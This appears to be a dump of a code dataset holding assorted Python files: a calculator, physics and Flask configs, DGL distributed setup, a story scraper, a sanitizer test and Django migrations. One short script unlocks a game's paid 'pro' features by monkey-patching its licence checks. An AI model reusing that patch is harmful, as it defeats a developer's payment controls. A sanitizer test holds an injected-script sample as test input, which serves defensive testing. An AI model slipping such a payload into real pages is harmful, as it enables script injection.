index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
990,900 | 6b0dc8484aa97bf8feb6c39b61f688323b79b53d | """Calculator For Random Things"""
__author__ = "Khushi Patel"
import math
def welcome_message():
    """Greet the user by name before the calculator session starts."""
    print("Welcome to the calculator.")
    user_name = input("What is your name? ")
    print("Let's get started, " + user_name + "! ", end='\n\n')
def addition(num1, num2):
    """
    Calculate, print, and return the sum of two numbers.

    The original docstring promised a return value that was never produced;
    the total is now returned as well (callers that ignore it are unaffected).

    :param num1: First addend, input by the user as a number
    :param num2: Second addend, input by the user as a number
    :return: The sum of num1 and num2
    """
    total = num1 + num2  # renamed from `sum` to avoid shadowing the builtin
    print("The sum is ", total, ".\n", sep="")
    return total
def subtraction(num1, num2):
    """
    Return the difference of two numbers.

    :param num1: First number inputed by the user, as a number.
    :param num2: Amount being subtracted from num1, as a number.
    :return: Difference between num1 and num2
    """
    return num1 - num2
def division(num1, num2):
    """
    Ask the user how to divide and print the result: either the exact
    quotient, or the remainder plus the floor-divided whole number.

    Fixes: a zero divisor previously raised an uncaught ZeroDivisionError;
    the remainder message contained a stray comma ("The remainder is, ").

    :param num1: The dividend, entered by the user as a number
    :param num2: The divisor, entered by the user as a number.
    """
    if num2 == 0:
        # Guard instead of crashing the whole program.
        print("Cannot divide by zero.\n")
        return
    choice = input(
        "Would you like \na) a quotient or \nb) the remainder and whole "
        "number?\n").lower()
    # only returns the quotient as a decimal
    if choice == "a":
        quotient = num1 / num2
        print("The quotient is ", quotient, ".", sep="")
    # returns the integer portion of the quotient and the remainder
    elif choice == "b":
        remainder = num1 % num2
        print("The remainder is ", remainder, ".", sep="")
        integer_portion = num1 // num2
        print("Floor division: ", integer_portion, ".\n", sep="")
def multiplication(num1, num2):
    """
    Return the product of two numbers.

    :param num1: First multiplier, entered by the user as a number.
    :param num2: Second multiplier, entered by the user as a number.
    :return: The product of num1 and num2
    """
    return num1 * num2
def exponents(num1, num2):
    """
    Return num1 raised to the power num2.

    :param num1: The base, entered by the user as a number.
    :param num2: The exponent, entered by the user as a number.
    :return: num1 to the power of num2.
    """
    result = num1 ** num2
    return result
def circle_area(radius):
    """
    Return the area of a circle (pi * r^2).

    :param radius: The radius given by the user, as a number.
    :return: The area of the circle
    """
    return math.pi * radius ** 2
def cube_area(side_length):
    """
    Return side_length cubed.

    NOTE: despite the name, this computes the cube's *volume* (s ** 3), not
    its surface area (which would be 6 * s ** 2).  The original docstring
    claimed "area"; the name is kept for backward compatibility.

    :param side_length: The length of one side of the cube, as a number.
    :return: side_length ** 3, i.e. the volume of the cube.
    """
    volume = side_length ** 3
    return volume
def inequalities(num1, num2):
    """
    Print which of <, =, > relates num1 to num2.

    Fixes two message defects: the equality branch was missing the space
    before "is" (printing e.g. "3is equal to 3"), and "great than" is now
    "greater than".

    :param num1: The first number to be compared in the inequality
    :param num2: The second number to be compared in the inequality
    """
    if num1 < num2:
        print(num1, " is less than ", num2, sep="")
    elif num1 == num2:
        print(num1, " is equal to ", num2, sep="")
    elif num1 > num2:
        print(num1, " is greater than ", num2, sep="")
    else:
        # Unorderable values (e.g. float('nan')) fall through to here.
        print("Could not compute an inequality.")
def range_function(num, start_range, end_range):
    """
    Report whether num lies in [start_range, end_range], inclusive.

    Fixes a boundary bug: the original used strict comparisons in both
    branches, so a number exactly equal to either endpoint printed nothing
    at all.  Endpoints now count as inside the range.

    :param num: The number being checked to see if it is in the range
    :param start_range: The lower end of the range
    :param end_range: The higher end of the range
    """
    if start_range <= num <= end_range:
        print(num, "is in the range.\n")
    else:
        print(num, "is not in the range.\n")
def _read_float(prompt):
    """Keep prompting until the user types a valid number; return it as float."""
    while True:
        try:
            return float(input(prompt))
        except ValueError:
            print("That was not a valid input.")


def _read_int(prompt):
    """Keep prompting until the user types a valid whole number; return an int."""
    while True:
        try:
            return int(input(prompt))
        except ValueError:
            print("That was not a valid input.")


def main():
    """
    The main function provides the user with a list of calculations to
    choose from, takes the user's input, and performs calculations based on
    the function corresponding to the choice the user made.

    Fixes over the original:
      * option 4 (multiplication) looped forever because its retry flag was
        never cleared after a successful calculation;
      * an invalid option number printed the "not an option" message twice;
      * invalid selections were counted as performed calculations.
    """
    welcome_message()
    continue_program = True
    num_calculations = 0  # counts only successfully completed calculations
    # all the calculation options in the program, in menu order
    calculation_options = ["addition", "subtraction", "division",
                           "multiplication", "exponents", "circle area",
                           "cube area", "repeat words", "inequalities",
                           "in-range", "stop program"]
    while continue_program:
        print("Enter the option number of the calculation you would like to "
              "perform: ")
        # prints the calculation options list as a numbered list
        for number, calculation in enumerate(calculation_options, start=1):
            print(number, ". ", calculation, sep="")
        user_input = _read_int("")
        if user_input == 1:  # addition
            addition(_read_float("Enter the first number: "),
                     _read_float("Enter the second number: "))
        elif user_input == 2:  # subtraction
            print("The difference is ",
                  subtraction(_read_float("Enter the first number: "),
                              _read_float("Enter the second number: ")),
                  ".\n", sep="")
        elif user_input == 3:  # division
            num1 = _read_float("Enter a number: ")
            num2 = _read_float("Enter a second number: ")
            division(num1, num2)
        elif user_input == 4:  # multiplication (original looped forever here)
            print("The product is ",
                  multiplication(_read_float("Enter a number: "),
                                 _read_float("Enter a second number: ")),
                  ".\n", sep="")
        elif user_input == 5:  # calculates num1 to the num2 power
            num1 = _read_float("Enter a number: ")
            num2 = _read_float("Enter a second number: ")
            print(num1, " to the ", num2, " power is ",
                  exponents(num1, num2), ".\n", sep="")
        elif user_input == 6:  # circle area
            print("The area is ",
                  circle_area(_read_float("Enter a radius: ")),
                  ".\n", sep="")
        elif user_input == 7:  # cube area
            print("The area of the cube is ",
                  cube_area(_read_float(
                      "Enter the length of one side of the cube")),
                  ".\n", sep="")
        elif user_input == 8:  # repeats a given word a number of times
            user_word = input("Enter the word you want to repeat: ")
            repeat = _read_int("How many times do you want to repeat it: ")
            print(user_word * repeat, "\n")
        elif user_input == 9:  # whether num1 <, >, or = num2
            inequalities(_read_float("Enter a number: "),
                         _read_float("Enter a second number: "))
        elif user_input == 10:  # whether a number is in a certain range
            range_function(_read_float("Enter a number: "),
                           _read_float("What number does the range start at? "),
                           _read_float("What number does the range end at? "))
        elif user_input == 11:  # report the count and stop running
            print("You ran the program", num_calculations, "times.")
            continue_program = False
        else:
            print("That was not an option. Please select an option from "
                  "1 to 11.")
            continue  # invalid choice: do not count it as a calculation
        if continue_program:
            num_calculations += 1  # count the completed calculation
# Launch the calculator only when this file is executed directly, not on import.
if __name__ == "__main__":
    main()
|
990,901 | 37edac5e903511e1766df914f133080a8c9abf41 | """Config for drift system.
This is a system of circles that drift with constant velocity, do not interact,
and do not bounce of the walls.
This config has a train mode and a test mode. In the train mode there are 3-5
sprites, yet in the test mode there are 6-11.
To demo this task, navigate to the main directory and run the following:
'''
$ python demo.py --config=spriteworld_physics.configs.drift \
--hsv_colors=True
'''
"""
# pylint: disable=import-error
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
from spriteworld import factor_distributions as distribs
from spriteworld import renderers as spriteworld_renderers
from spriteworld_physics import forces
from spriteworld_physics import generate_sprites
from spriteworld_physics import graph_generators
# Number of sprites sampled per episode: 3-5 in train mode, 6-11 in test mode
# (np.random.randint upper bounds are exclusive).
_NUM_SPRITES = {
    'train': lambda: np.random.randint(3, 6),
    'test': lambda: np.random.randint(6, 12),
}
def get_config(mode='train'):
    """Generate environment config.

    Args:
        mode: Task mode, 'train' or 'test'.  (The original docstring called
            this "Unused", but it selects how many sprites are sampled per
            episode via _NUM_SPRITES and is recorded in the config metadata.)

    Returns:
        config: Dictionary defining task/environment configuration. Can be fed
            as kwargs to physics_environment.PhysicsEnvironment.
    """
    # Factor distributions for the sprites.
    factors = distribs.Product([
        distribs.Continuous('x', 0.1, 0.9),
        distribs.Continuous('y', 0.1, 0.9),
        distribs.Discrete('shape', ['circle']),
        distribs.Discrete('scale', [0.1]),
        # c0 varies per sprite while c1/c2 are pinned to 1.
        distribs.Continuous('c0', 0, 1),
        distribs.Discrete('c1', [1.]),
        distribs.Discrete('c2', [1.]),
        distribs.Continuous('x_vel', -0.03, 0.03),
        distribs.Continuous('y_vel', -0.03, 0.03),
        distribs.Discrete('mass', [1]),
    ])
    num_sprites = _NUM_SPRITES[mode]
    sprite_gen = generate_sprites.generate_sprites(
        factors, num_sprites=num_sprites)
    # NoForce on a fully connected graph: sprites drift without interacting.
    graph_generator = graph_generators.FullyConnected(force=forces.NoForce)
    renderers = {
        'image':
            spriteworld_renderers.PILRenderer(
                image_size=(64, 64), anti_aliasing=5)
    }
    config = {
        'graph_generators': (graph_generator,),
        'renderers': renderers,
        'init_sprites': sprite_gen,
        'episode_length': 20,
        'bounce_off_walls': False,  # matches the "do not bounce" module docstring
        'metadata': {
            'name': os.path.basename(__file__),
            'mode': mode
        }
    }
    return config
|
990,902 | 6959a05fa9d84982a113eeaeea8e4d95ad612924 | #modBySobyDamn
from bsUtils import *
import bsUtils
bs.screenMessage("Pro Unlocked By SobyDamn")
def _000OOO0():
    # Replacement for bsUtils._haveProOptions: always report pro options available.
    return True


def _00000OOO():
    # Replacement for bsUtils._havePro: always report the pro upgrade as owned.
    return True


# Monkey-patch bsUtils so the game treats "pro" as unlocked.
bsUtils._haveProOptions = _000OOO0
bsUtils._havePro = _00000OOO
990,903 | a4303f7fb10c65ca80a2692daa7bae03364e4e8c | import unittest
from bs4 import BeautifulSoup
from webstories import Story, StoryPage
class TestStory(unittest.TestCase):
    """Tests for webstories.Story / StoryPage parsing and HTML cleaning."""

    def setUp(self):
        """Build example AMP story documents and their expected cleaned HTML."""
        # A well-formed AMP story with a cover page and one content page.
        self.example_html = """
<!doctype html>
<html ⚡>
<head>
<meta charset="utf-8">
<title>Joy of Pets</title>
<link rel="canonical" href="pets.html">
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
<script async src="https://cdn.ampproject.org/v0.js"></script>
<script async custom-element="amp-video"
src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script>
<script async custom-element="amp-story"
src="https://cdn.ampproject.org/v0/amp-story-1.0.js"></script>
<style amp-custom>#page1 {background-color: blue;}</style>
</head>
<body>
<!-- Cover page -->
<amp-story standalone
title="Joy of Pets"
publisher="AMP tutorials"
publisher-logo-src="assets/AMP-Brand-White-Icon.svg"
poster-portrait-src="assets/cover.jpg">
<amp-story-page id="cover">
<amp-story-grid-layer template="fill">
<amp-img src="assets/cover.jpg"
width="720" height="1280"
layout="responsive">
</amp-img>
</amp-story-grid-layer>
<amp-story-grid-layer template="vertical">
<h1>The Joy of Pets</h1>
<p>By AMP Tutorials</p>
</amp-story-grid-layer>
</amp-story-page>
<!-- Page 1 -->
<amp-story-page id="page1">
<amp-story-grid-layer template="vertical">
<h1>Cats</h1>
<amp-img src="assets/cat.jpg"
width="720" height="1280"
layout="responsive">
</amp-img>
<q>Dogs come when they're called. Cats take a message and get back to you. --Mary Bly</q>
</amp-story-grid-layer>
</amp-story-page>
</amp-story>
</body>
</html>
"""
        # Expected cleaned output for pages[1] of example_html.
        self.expected_clean_html_good = """
<amp-story-page id="page1">
<amp-story-grid-layer template="vertical">
<h1>Cats</h1>
<amp-img height="1280" layout="responsive" src="assets/cat.jpg" width="720">
</amp-img>
<q>Dogs come when they're called. Cats take a message and get back to you. --Mary Bly</q>
</amp-story-grid-layer>
</amp-story-page>
"""
        # A story containing disallowed content: a non-data attribute
        # ("sugar"), an executable <script>, and a <form> wrapper.
        self.example_bad_html = """
<!doctype html>
<html ⚡>
<head>
<meta charset="utf-8">
<title>Joy of Pets</title>
<link rel="canonical" href="pets.html">
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
<script async src="https://cdn.ampproject.org/v0.js"></script>
<script async custom-element="amp-video"
src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script>
<script async custom-element="amp-story"
src="https://cdn.ampproject.org/v0/amp-story-1.0.js"></script>
<style amp-custom>
</style>
</head>
<body>
<!-- Cover page -->
<amp-story standalone
title="Joy of Pets"
publisher="AMP tutorials"
publisher-logo-src="assets/AMP-Brand-White-Icon.svg"
poster-portrait-src="assets/cover.jpg">
<amp-story-page id="cover">
<amp-story-grid-layer template="fill" data-coffee="yes" sugar="no">
<script>alert('evil javascript');</script>
<script type="application/json">{"text": "JSON is OK"}</script>
<amp-img src="assets/cover.jpg"
width="720" height="1280"
layout="responsive">
</amp-img>
</amp-story-grid-layer>
<amp-story-grid-layer template="vertical">
<h1>The Joy of Pets</h1>
<p>By AMP Tutorials</p>
<form>
<p>look at me, I'm in a form</p>
</form>
</amp-story-grid-layer>
</amp-story-page>
</amp-story>
</body>
</html>
"""
        # Expected cleaned output: data-* attribute kept, "sugar" dropped,
        # executable script removed (JSON script kept), form unwrapped.
        self.expected_clean_html_bad = """
<amp-story-page id="cover">
<amp-story-grid-layer template="fill" data-coffee="yes">
<script type="application/json">{"text": "JSON is OK"}</script>
<amp-img src="assets/cover.jpg" width="720" height="1280" layout="responsive">
</amp-img>
</amp-story-grid-layer>
<amp-story-grid-layer template="vertical">
<h1>The Joy of Pets</h1>
<p>By AMP Tutorials</p>
<p>look at me, I'm in a form</p>
</amp-story-grid-layer>
</amp-story-page>
"""

    def assertHTMLEqual(self, str1, str2):
        """Assert two HTML fragments are structurally equal by comparing
        their BeautifulSoup parse trees (ignores surrounding whitespace)."""
        soup1 = BeautifulSoup(str1.strip(), 'html.parser')
        soup2 = BeautifulSoup(str2.strip(), 'html.parser')
        self.assertEqual(soup1, soup2)

    def test_properties(self):
        """Story exposes title, publisher, custom CSS, and page ids."""
        story = Story(self.example_html)
        self.assertEqual(story.title, "Joy of Pets")
        self.assertEqual(story.publisher, "AMP tutorials")
        self.assertEqual(story.custom_css, "#page1 {background-color: blue;}")
        self.assertEqual(story.pages[0].id, "cover")

    def test_reject_invalid_story(self):
        """Non-AMP-story HTML raises Story.InvalidStoryException."""
        with self.assertRaises(Story.InvalidStoryException):
            Story("<!doctype html><html><head></head><body><p>Not a story</p></body></html>")

    def test_clean_html(self):
        """get_clean_html sanitises both well-formed and hostile pages."""
        story = Story(self.example_html)
        self.assertHTMLEqual(story.pages[1].get_clean_html(), self.expected_clean_html_good)
        story = Story(self.example_bad_html)
        self.assertHTMLEqual(story.pages[0].get_clean_html(), self.expected_clean_html_bad)

    def test_clean_html_static_method(self):
        """StoryPage.clean_html_fragment works on a bare fragment too."""
        bad_html = """
<amp-story-page id="cover">
<amp-story-grid-layer template="fill" data-coffee="yes" sugar="no">
<script>alert('evil javascript');</script>
<script type="application/json">{"text": "JSON is OK"}</script>
<amp-img src="assets/cover.jpg"
width="720" height="1280"
layout="responsive">
</amp-img>
</amp-story-grid-layer>
<amp-story-grid-layer template="vertical">
<h1>The Joy of Pets</h1>
<p>By AMP Tutorials</p>
<form>
<p>look at me, I'm in a form</p>
</form>
</amp-story-grid-layer>
</amp-story-page>
"""
        self.assertHTMLEqual(StoryPage.clean_html_fragment(bad_html), self.expected_clean_html_bad)
|
990,904 | b55851f00e7e98da5bb213a20538040b561900fd | import inspect
import os
import sys
# Absolute directory containing this file, resolved via the current frame so
# it works regardless of the interpreter's working directory.
CURRENT_DIR = os.path.dirname(os.path.abspath(
    inspect.getfile(inspect.currentframe())))
PARENT_DIR = os.path.dirname(CURRENT_DIR)
# Include paths for module search
sys.path.insert(0, PARENT_DIR)
import numpy as np
import pytest
from myapi import vecutil
class TestVecUtil():
    """Unit tests for myapi.vecutil's vector helpers."""

    def test_random_vec_success(self):
        """random_vec(n) returns a vector with exactly n elements."""
        for length in (1, 5):
            vector = vecutil.random_vec(length)
            assert len(vector) == length

    def test_random_vec_fail(self):
        """random_vec rejects non-positive and non-integer lengths."""
        for bad_length in (-1, 0, 1.5):
            with pytest.raises(ValueError):
                vecutil.random_vec(bad_length)

    def test_normalize_vec(self):
        """normalize_vec returns a unit-norm vector."""
        length = 5
        vector = vecutil.random_vec(length)
        norm_vec = vecutil.normalize_vec(vector)
        # Compare double value with a tolerance.  BUG FIX: the original
        # asserted `norm - 1 < 1e-8` without abs(), which passes for ANY
        # norm smaller than 1 and so never caught under-normalized vectors.
        assert abs(np.linalg.norm(norm_vec) - 1) < 0.00000001
990,905 | 7831a1b567629aac87577f12cadafffa7cd65e2f | from flask_sqlalchemy import SQLAlchemy
from flask import Flask, request, jsonify, render_template
from db import Member, Facility, db
import json
import psycopg2
import config
app = Flask(__name__)
app.config["DEBUG"] = False
# app config
app.config["SQLALCHEMY_DATABASE_URI"] = config.URI  # connection string from config.py
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False  # disable modification tracking
app.config["SQLALCHEMY_ECHO"] = True  # echo emitted SQL statements for debugging
db.init_app(app)
# Create all tables declared on the shared db instance at import time.
with app.app_context():
    db.create_all()
@app.route('/')
def hello():
    """Root endpoint: return the clubhouse manager welcome banner."""
    banner = "Welcome to the Kalpataru Residency's ClubHouse Manager!"
    return banner
# Start Flask's built-in development server only when run directly.
if __name__ == '__main__':
    app.run()
|
990,906 | 8e2a2cf1a7084e8477987006823acc17a6adb62b | """Initialize the distributed services"""
import multiprocessing as mp
import traceback
import atexit
import time
import os
import sys
from . import rpc
from .constants import MAX_QUEUE_SIZE
from .kvstore import init_kvstore, close_kvstore
from .rpc_client import connect_to_server, shutdown_servers
from .role import init_role
from .. import utils
# Process-wide state for the distributed client in this process.
SAMPLER_POOL = None  # multiprocessing pool of sampler workers, or None
NUM_SAMPLER_WORKERS = 0  # number of processes in SAMPLER_POOL
INITIALIZED = False  # whether the rpc layer has been initialized
def set_initialized(value=True):
    """Set the initialized state of rpc.

    Args:
        value: New initialized state; defaults to True.
    """
    global INITIALIZED
    INITIALIZED = value
def get_sampler_pool():
    """Return the sampler pool and num_workers.

    Returns:
        tuple: (SAMPLER_POOL, NUM_SAMPLER_WORKERS) — the module-level pool
        (or None when no sampler workers were created) and its worker count.
    """
    return SAMPLER_POOL, NUM_SAMPLER_WORKERS
def _init_rpc(ip_config, num_servers, max_queue_size, net_type, role, num_threads):
    ''' This init function is called in the worker processes.

    It caps the worker's thread count, connects to the servers (unless
    running standalone), then initializes the worker's role and kvstore.
    '''
    try:
        utils.set_num_threads(num_threads)
        if os.environ.get('DGL_DIST_MODE', 'standalone') != 'standalone':
            connect_to_server(ip_config, num_servers, max_queue_size, net_type)
        init_role(role)
        init_kvstore(ip_config, num_servers, role)
    except Exception as e:
        # Print inside the worker process so the failure is visible before
        # the exception propagates back through the pool.
        print(e, flush=True)
        traceback.print_exc()
        raise e
def initialize(ip_config, num_servers=1, num_workers=0,
               max_queue_size=MAX_QUEUE_SIZE, net_type='socket',
               num_worker_threads=1):
    """Initialize DGL's distributed module

    This function initializes DGL's distributed module. It acts differently in server
    or client modes. In the server mode, it runs the server code and never returns.
    In the client mode, it builds connections with servers for communication and
    creates worker processes for distributed sampling. `num_workers` specifies
    the number of sampling worker processes per trainer process.

    Users also have to provide the number of server processes on each machine in order
    to connect to all the server processes in the cluster of machines correctly.

    Parameters
    ----------
    ip_config: str
        File path of ip_config file
    num_servers : int
        The number of server processes on each machine. This argument is deprecated in DGL 0.7.0.
    num_workers: int
        Number of worker process on each machine. The worker processes are used
        for distributed sampling. This argument is deprecated in DGL 0.7.0.
    max_queue_size : int
        Maximal size (bytes) of client queue buffer (~20 GB on default).
        Note that the 20 GB is just an upper-bound and DGL uses zero-copy and
        it will not allocate 20GB memory at once.
    net_type : str, optional
        Networking type. Currently the only valid option is ``'socket'``.
        Default: ``'socket'``
    num_worker_threads: int
        The number of threads in a worker process.

    Note
    ----
    Users have to invoke this API before any DGL's distributed API and framework-specific
    distributed API. For example, when used with Pytorch, users have to invoke this function
    before Pytorch's `pytorch.distributed.init_process_group`.
    """
    if os.environ.get('DGL_ROLE', 'client') == 'server':
        # Server mode: build and start a graph server.  start() runs the
        # serving loop; the process terminates via sys.exit() afterwards.
        from .dist_graph import DistGraphServer
        assert os.environ.get('DGL_SERVER_ID') is not None, \
            'Please define DGL_SERVER_ID to run DistGraph server'
        assert os.environ.get('DGL_IP_CONFIG') is not None, \
            'Please define DGL_IP_CONFIG to run DistGraph server'
        assert os.environ.get('DGL_NUM_SERVER') is not None, \
            'Please define DGL_NUM_SERVER to run DistGraph server'
        assert os.environ.get('DGL_NUM_CLIENT') is not None, \
            'Please define DGL_NUM_CLIENT to run DistGraph server'
        assert os.environ.get('DGL_CONF_PATH') is not None, \
            'Please define DGL_CONF_PATH to run DistGraph server'
        serv = DistGraphServer(int(os.environ.get('DGL_SERVER_ID')),
                               os.environ.get('DGL_IP_CONFIG'),
                               int(os.environ.get('DGL_NUM_SERVER')),
                               int(os.environ.get('DGL_NUM_CLIENT')),
                               os.environ.get('DGL_CONF_PATH'))
        serv.start()
        sys.exit()
    else:
        # Client mode: environment variables, when present, take precedence
        # over the (deprecated) num_workers/num_servers arguments.
        if os.environ.get('DGL_NUM_SAMPLER') is not None:
            num_workers = int(os.environ.get('DGL_NUM_SAMPLER'))
        else:
            num_workers = 0
        if os.environ.get('DGL_NUM_SERVER') is not None:
            num_servers = int(os.environ.get('DGL_NUM_SERVER'))
        else:
            num_servers = 1
        rpc.reset()
        # 'spawn' start method so worker processes begin with a fresh state.
        ctx = mp.get_context("spawn")
        global SAMPLER_POOL
        global NUM_SAMPLER_WORKERS
        is_standalone = os.environ.get('DGL_DIST_MODE', 'standalone') == 'standalone'
        if num_workers > 0 and not is_standalone:
            # Each pool worker connects to the servers via _init_rpc.
            SAMPLER_POOL = ctx.Pool(num_workers, initializer=_init_rpc,
                                    initargs=(ip_config, num_servers, max_queue_size,
                                              net_type, 'sampler', num_worker_threads))
        else:
            SAMPLER_POOL = None
        NUM_SAMPLER_WORKERS = num_workers
        if not is_standalone:
            assert num_servers is not None and num_servers > 0, \
                'The number of servers per machine must be specified with a positive number.'
            connect_to_server(ip_config, num_servers, max_queue_size, net_type)
        init_role('default')
        init_kvstore(ip_config, num_servers, 'default')
def finalize_client():
    """Release resources of this client."""
    if os.environ.get('DGL_DIST_MODE', 'standalone') != 'standalone':
        # Tear down the rpc endpoints only in true distributed mode.
        rpc.finalize_sender()
        rpc.finalize_receiver()
    global INITIALIZED
    INITIALIZED = False
def _exit():
    # Runs inside a sampler worker process: shut this worker's client down,
    # then pause briefly before the process exits.
    exit_client()
    time.sleep(1)
def finalize_worker():
    """Finalize workers

    Python's multiprocessing pool will not call atexit function when close,
    so an explicit _exit task is queued for every sampler worker.
    """
    if SAMPLER_POOL is not None:
        for _ in range(NUM_SAMPLER_WORKERS):
            SAMPLER_POOL.apply_async(_exit)
            time.sleep(0.1) # This is necessary but I don't know why
        SAMPLER_POOL.close()
def join_finalize_worker():
    """join the worker close process

    Blocks until all sampler workers have exited, then drops the pool
    reference so it can be garbage-collected.
    """
    global SAMPLER_POOL
    if SAMPLER_POOL is not None:
        SAMPLER_POOL.join()
        SAMPLER_POOL = None
def is_initialized():
    """Is RPC initialized?

    Returns:
        The module-level INITIALIZED flag.
    """
    return INITIALIZED
def exit_client():
    """Trainer exits

    This function is called automatically when a Python process exits. Normally,
    the training script does not need to invoke this function at the end.

    In the case that the training script needs to initialize the distributed module
    multiple times (so far, this is needed in the unit tests), the training script
    needs to call `exit_client` before calling `initialize` again.
    """
    # Only client with rank_0 will send shutdown request to servers.
    # Finalizing workers should be earlier than the barrier, and is non-blocking.
    finalize_worker()
    if os.environ.get('DGL_DIST_MODE', 'standalone') != 'standalone':
        rpc.client_barrier()
        shutdown_servers()
        finalize_client()
    join_finalize_worker()
    close_kvstore()
    # This teardown just ran; remove it from the atexit hooks so it is not
    # invoked a second time at interpreter shutdown.
    atexit.unregister(exit_client)
|
990,907 | 9cd6e75cf7f4921eb30834b7412bc35f8e7b7d04 | #!/usr/bin/env python3
import argparse
from bs4 import BeautifulSoup
import logging
import os
import pdb
import requests
import subprocess
def initlog():
    """Configure root logging at DEBUG level and return a 'scraper' logger
    that additionally writes to ./scraper.log."""
    fmt = '%(asctime)s %(levelname)s %(lineno)s %(message)s'
    logging.basicConfig(level=logging.DEBUG, format=fmt)
    log = logging.getLogger('scraper')
    file_handler = logging.FileHandler(filename='./scraper.log')
    file_handler.setFormatter(logging.Formatter(fmt=fmt))
    file_handler.setLevel(logging.DEBUG)
    log.addHandler(file_handler)
    return log
def commandline(argv=None):
    """Parse command-line options for the scraper.

    Generalized to accept an explicit argument list (useful for testing);
    the large block of commented-out dead options from an unrelated film
    scanner was removed.

    Args:
        argv: Optional list of argument strings; defaults to sys.argv[1:].

    Returns:
        argparse.Namespace with `dryrun` (bool) and `src` (source URL).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--dryrun', dest='dryrun', default=False,
                        action='store_true')
    parser.add_argument(dest='src', help='source (URL)')
    return parser.parse_args(argv)
def getstory(log, title, url):
    """Download one story page and convert it to EPUB with pandoc.

    Skips all work when '{title}.html' already exists.

    Args:
        log: logger for progress and errors.
        title: story title, used for the output filenames.
        url: page URL whose 'story-text' element holds the story body.
    """
    if os.path.exists(f'{title}.html'):
        return  # already fetched and converted
    log.info(title)
    doc = requests.get(url)
    if 200 != doc.status_code:
        # BUG FIX: original referenced the undefined name `r` here, raising
        # NameError on any non-200 response instead of logging it.
        log.error(f'getstory returns {doc.status_code}')
        return
    soup = BeautifulSoup(doc.text, 'html.parser')
    text = soup.find(class_='story-text')
    # Use a context manager instead of leaking the file handle.
    with open(f'{title}.html', 'wb') as out:
        out.write(f'{soup.html.title}<body>{text.prettify()}</body>'.encode())
    cmd = ['pandoc', '--to', 'epub', '--metadata', f'title:{title}',
           f'{title}.html', '-o', f'{title}.epub']
    log.info(cmd)
    subprocess.run(cmd)
def backissue(log, cmd):
    """Scrape every FICTION story linked from a back-issue index page.

    Args:
        log: logger for progress and errors.
        cmd: parsed arguments; cmd.src is the back-issue index URL.
    """
    doc = requests.get(cmd.src)
    if 200 != doc.status_code:
        # BUG FIX: original was "'http returns {}'.r.status_code" — an
        # AttributeError on str.  Log the real status code instead.
        log.error(f'http returns {doc.status_code}')
        return
    soup = BeautifulSoup(doc.text, 'html.parser')
    for index in soup(class_='index-table'):
        for section in index(class_='section'):
            if not 'FICTION' == section.text:
                continue  # only the fiction section is wanted
            stories = [story.a for story in section.parent(class_='story')]
            for title, url in [(s.text, s['href']) for s in stories]:
                getstory(log, title, url)
def main():
    """Entry point: configure logging, parse arguments, scrape the issue."""
    logger = initlog()
    args = commandline()
    backissue(logger, args)
main()
|
990,908 | b6e412119e01e6c64ec2602003fbd7f577d13e95 | # Generated by Django 2.2.10 on 2021-10-05 20:30
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Replace the old Answers model with a singular Answer model that stores
    its payload as JSONB and references main.Question."""

    dependencies = [
        ('main', '0003_auto_20211005_2217'),
    ]

    operations = [
        migrations.CreateModel(
            name='Answer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('uuid', models.IntegerField()),
                # Free-form answer payload stored as PostgreSQL JSONB.
                ('answer', django.contrib.postgres.fields.jsonb.JSONField()),
                # Deleting a Question cascades to its Answers.
                ('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Question')),
            ],
            options={
                'verbose_name': 'Ответ',
                'verbose_name_plural': 'Ответы',
            },
        ),
        migrations.DeleteModel(
            name='Answers',
        ),
    ]
|
990,909 | a46308c8e2284a4a16bfdf3e710fd73118bc3545 | # Generated by Django 2.2 on 2019-04-20 16:15
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ReferenceEquipment model, backed by the explicitly named
    'ReferenceEquipment' database table."""

    dependencies = [
        ('cergen', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='ReferenceEquipment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('description', models.CharField(max_length=150)),
                ('serial_number', models.CharField(max_length=150)),
                ('protocol', models.CharField(max_length=150)),
                ('callibration_data', models.CharField(max_length=150)),
                ('validity', models.CharField(max_length=150)),
            ],
            options={
                'db_table': 'ReferenceEquipment',
            },
        ),
    ]
|
990,910 | 1a2752cd47cca9b16c6f0572346bae0e06d3ce28 | '''
